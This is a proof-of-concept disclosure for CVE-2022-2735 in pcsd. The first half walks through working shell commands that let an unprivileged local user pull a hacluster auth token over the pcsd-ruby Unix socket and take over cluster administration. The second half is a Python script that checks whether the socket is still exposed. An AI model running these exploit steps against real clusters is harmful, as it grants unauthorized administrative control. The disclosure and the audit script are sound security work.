POC [CVE-2022-2735]


Steps to reproduce:

[testuser@rhel90-node1 ~]$ pcs status
Warning: Unable to read the known-hosts file: No such file or directory: '/home/testuser/.pcs/known-hosts'
Error: Unable to authenticate against the local pcsd. Run the same command as root or authenticate yourself to the local pcsd using command 'pcs client local-auth'

[testuser@rhel90-node1 ~]$ pcs client local-auth -u testuser -p 1234
Error: Access denied

[testuser@rhel90-node1 ~]$ curl -X POST --unix-socket /var/run/pcsd-ruby.socket --header "X_PCSD_TYPE: sinatra_remote" http:/remote/remote/auth?username=hacluster | python3 -c "import sys, json, base64; print(base64.b64decode(json.load(sys.stdin)['body']).decode())" > token.tmp
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
100   159    0   159    0     0  79500      0 --:--:-- --:--:-- --:--:--  155k

[testuser@rhel90-node1 ~]$ cat token.tmp
9d320b2c-11e7-40c4-be7b-12795a1dc39e

Once we have the token, we can either use it to call the REST API directly or save it into the user's pcs configuration and then use ordinary pcs commands:

[testuser@rhel90-node1 ~]$ mkdir -p ~/.pcs; export TOKEN=`cat token.tmp`; echo -e '{"format_version":1,"data_version":1,"known_hosts":{"localhost":{"dest_list":[{"addr":"localhost","port":2224}],"token":"$TOKEN"}}}' | envsubst > ~/.pcs/known-hosts

[testuser@rhel90-node1 ~]$ pcs status
Cluster name: testcluster
Cluster Summary:
  * Stack: corosync
  * Current DC: localhost (version 2.1.2-4.el9-ada5c3b36e2) - partition with quorum
  * Last updated: Thu Aug  4 14:08:52 2022
  * Last change:  Thu Jun 16 15:30:00 2022 by hacluster via cibadmin on localhost
  * 1 node configured
  * 4 resource instances configured

Node List:
  * Online: [ localhost ]

Full List of Resources:
  * dummy       (ocf:pacemaker:Dummy):   Started localhost
  * dummy2      (ocf:pacemaker:Dummy):   Started localhost
  * dummy3      (ocf:pacemaker:Dummy):   Started localhost
  * Clone Set: dummy4-clone [dummy4]:
    * Started: [ localhost ]

Daemon Status:
  corosync: active/disabled
  pacemaker: active/disabled
  pcsd: active/enabled
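The steps above work because an unprivileged local user can reach the pcsd-ruby Unix socket. As an added defender-side check (not part of the original PoC and not pcs project code), the script below audits the socket's owner, type and permission bits without connecting to it; the hardened state it expects (root-owned, no group/other access bits) and the names PCSD_RUBY_SOCKET, socket_findings and is_hardened are this example's own assumptions.

```python
"""Audit the permissions of the pcsd-ruby Unix socket used in the PoC above.

Assumed hardened state: the socket is owned by root and carries no
group/other permission bits, so only root can connect and request tokens.
"""
import os
import stat
import sys

# Socket path as shown in the PoC's curl command.
PCSD_RUBY_SOCKET = "/var/run/pcsd-ruby.socket"
# Any of these bits lets a non-owner (non-root) user open the socket.
GROUP_OTHER_BITS = stat.S_IRWXG | stat.S_IRWXO


def socket_findings(path: str) -> list[str]:
    """Return findings for the socket at `path`; an empty list means it looks hardened.

    Only stat() is used, so this is safe to run on a live cluster node.
    """
    findings = []
    try:
        st = os.lstat(path)
    except FileNotFoundError:
        return [f"{path} does not exist (pcsd not running, or a different socket path)"]
    if not stat.S_ISSOCK(st.st_mode):
        findings.append(f"{path} is not a Unix socket")
    if st.st_uid != 0:
        findings.append(f"owner uid {st.st_uid} is not root")
    if st.st_mode & GROUP_OTHER_BITS:
        findings.append(
            f"mode {stat.filemode(st.st_mode)} grants access to group/other; "
            "any local user could request a pcsd auth token"
        )
    return findings


def is_hardened(path: str = PCSD_RUBY_SOCKET) -> bool:
    """True when no findings are reported for `path`."""
    return not socket_findings(path)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else PCSD_RUBY_SOCKET
    problems = socket_findings(target)
    for problem in problems:
        print("FINDING:", problem)
    print("OK: socket looks hardened" if not problems else f"{len(problems)} finding(s)")
    sys.exit(1 if problems else 0)
```

Run it as any user on a node; a non-zero exit with a "group/other" finding means the condition the PoC relies on is still present.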
